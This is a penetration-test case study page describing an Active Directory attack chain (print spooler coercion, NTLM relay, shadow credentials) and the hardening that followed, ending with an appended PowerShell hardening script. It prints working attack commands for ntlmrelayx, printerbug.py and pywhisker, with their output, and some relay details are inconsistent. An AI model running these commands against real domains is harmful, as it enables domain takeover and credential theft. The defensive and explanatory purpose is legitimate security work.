/ CASE STUDY // 01
SYSTEM_TAKEOVER.LOG

Active Directory Attack Path

A clinical walkthrough of chaining NTLM relaying with unpatched print spooler vulnerabilities to achieve full domain compromise, executed without triggering standard endpoint alerts.

ntlmrelayx.py -t ldap://dc01.local --escalate-user attacker
[*] Requesting TGT for DC01$...
[+] Success! Ticket written to dc01.ccache
[*] Dumping NTDS.dit hashes...

• THE CHAIN

From Zero to Domain Admin

This engagement demonstrated how minor, low-severity misconfigurations can be chained together to compromise an entire enterprise environment. By exploiting legacy protocols, we bypassed traditional perimeter defenses.

Phase 1: Coercion & Relay

PRINTER_BUG.SH

We initiated the attack path by forcing a Domain Controller to authenticate to an attacker-controlled listener using the legacy Print Spooler service, relaying that authentication directly to AD CS.

printerbug.py local.domain/attacker:pass@dc01.local 10.10.10.5
[*] Coercing DC01 to authenticate to 10.10.10.5...
[+] Connection received on port 445.

Phase 2: Shadow Credentials

CREDENTIAL_BYPASS.SH

With the relayed session, we injected a new public key into the target computer account's attributes, allowing us to request a certificate for that account and forge a Kerberos Ticket-Granting Ticket.

pywhisker.py -d local.domain -u 'dc01$' --action "add" --key "new_key"
[*] Injecting shadow credentials...
[+] msDS-KeyCredentialLink updated successfully.

+ HARDENING

Enforcing Zero-Trust

Securing the domain required breaking the exploit chain at multiple points. We implemented a zero-trust architecture that restricts legacy traffic and enforces strict cryptographic verification.

Disable NTLM

We enforced SMB signing globally and completely disabled legacy NTLM authentication across the domain, forcing all authentication traffic to use Kerberos.

AD CS Hardening

We disabled HTTP enrollment endpoints on all active Certificate Authorities and enforced Extended Protection for Authentication to prevent credential relaying.

Spooler Cleanup

We disabled the Print Spooler service on all Domain Controllers and tier-0 assets, permanently eliminating the primary coercion vectors.
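The three hardening steps above, as an added PowerShell example that is not the case study's own script. It assumes a domain-joined admin workstation with the ActiveDirectory module, WinRM access to the Domain Controllers, and, on the CA, the WebAdministration module with the web enrollment application at the default IIS location (the `$SitePath` value is an assumption to adjust per environment). Group Policy is the durable way to roll these settings out; the functions here apply the same settings locally and read them back so the result can be verified.

```powershell
#Requires -RunAsAdministrator
# Added hardening example (not the engagement's code). Each function is
# idempotent and can be run alone; Get-HardeningStatus reads the state back.
$ErrorActionPreference = 'Stop'

$Lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$Msv = Join-Path $Lsa 'MSV1_0'

# 1. Disable NTLM: require SMB signing on both sides and refuse NTLM.
#    Before enforcing, set the Audit* counterparts (AuditReceivingNTLMTraffic,
#    AuditNTLMInDomain) and review Microsoft-Windows-NTLM/Operational event 8004
#    so remaining NTLM clients are found rather than broken.
function Set-SmbAndNtlmHardening {
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
    # 5 = NTLMv2 only, refuse LM and NTLMv1; then refuse NTLM outright (2 = deny all)
    Set-ItemProperty -Path $Lsa -Name LmCompatibilityLevel          -Value 5 -Type DWord
    Set-ItemProperty -Path $Msv -Name RestrictSendingNTLMTraffic    -Value 2 -Type DWord
    Set-ItemProperty -Path $Msv -Name RestrictReceivingNTLMTraffic  -Value 2 -Type DWord
}

# 2. AD CS: remove the HTTP enrollment endpoints, or, where they must stay,
#    require Extended Protection (channel binding), Kerberos-only Windows auth
#    and TLS on the CertSrv application so a relayed NTLM session is rejected.
function Protect-AdcsWebEnrollment {
    param(
        [switch]$RemoveEndpoints,
        [string]$SitePath = 'Default Web Site/CertSrv'   # assumption: default IIS path
    )
    if ($RemoveEndpoints) {
        Import-Module ADCSDeployment
        Uninstall-AdcsWebEnrollment -Force
        Uninstall-AdcsEnrollmentWebService -Force
        return
    }
    Import-Module WebAdministration
    $common = @{ PSPath = 'MACHINE/WEBROOT/APPHOST'; Location = $SitePath }
    $winAuth = 'system.webServer/security/authentication/windowsAuthentication'
    Set-WebConfigurationProperty @common -Filter "$winAuth/extendedProtection" `
        -Name tokenChecking -Value 'Require'
    # Drop the NTLM provider; Negotiate with Kerberos remains
    Remove-WebConfigurationProperty @common -Filter "$winAuth/providers" `
        -Name '.' -AtElement @{ value = 'NTLM' }
    Set-WebConfigurationProperty @common -Filter 'system.webServer/security/access' `
        -Name sslFlags -Value 'Ssl'
}

# 3. Spooler cleanup: stop and disable the Print Spooler on every DC, and report.
function Disable-SpoolerOnDomainControllers {
    $dcs = (Get-ADDomainController -Filter *).HostName
    Invoke-Command -ComputerName $dcs -ScriptBlock {
        Stop-Service -Name Spooler -Force
        Set-Service  -Name Spooler -StartupType Disabled
        [pscustomobject]@{
            Host    = $env:COMPUTERNAME
            Spooler = (Get-Service -Name Spooler).StartType
        }
    }
}

# Read the local NTLM/SMB state back so the change can be verified or audited.
function Get-HardeningStatus {
    [pscustomobject]@{
        SmbServerSigning  = (Get-SmbServerConfiguration).RequireSecuritySignature
        SmbClientSigning  = (Get-SmbClientConfiguration).RequireSecuritySignature
        LmCompatibility   = (Get-ItemProperty $Lsa).LmCompatibilityLevel
        NtlmOutbound      = (Get-ItemProperty $Msv).RestrictSendingNTLMTraffic
        NtlmInbound       = (Get-ItemProperty $Msv).RestrictReceivingNTLMTraffic
        SpoolerStartType  = (Get-Service -Name Spooler).StartType
    }
}

# Example run on a DC or CA (comment out what does not apply to the host):
# Set-SmbAndNtlmHardening
# Protect-AdcsWebEnrollment -RemoveEndpoints
# Disable-SpoolerOnDomainControllers | Format-Table
# Get-HardeningStatus
```

The NTLM restriction is the step most likely to break something, which is why the comment points at the audit-first path: set the audit values, collect NTLM operational events for a cycle of business activity, and only then switch the Restrict* values to deny. Removing the web enrollment role services is preferable to hardening them, since an endpoint that does not exist cannot be relayed to; the EPA, Kerberos-only and TLS settings are the fallback for environments that still depend on HTTP enrollment.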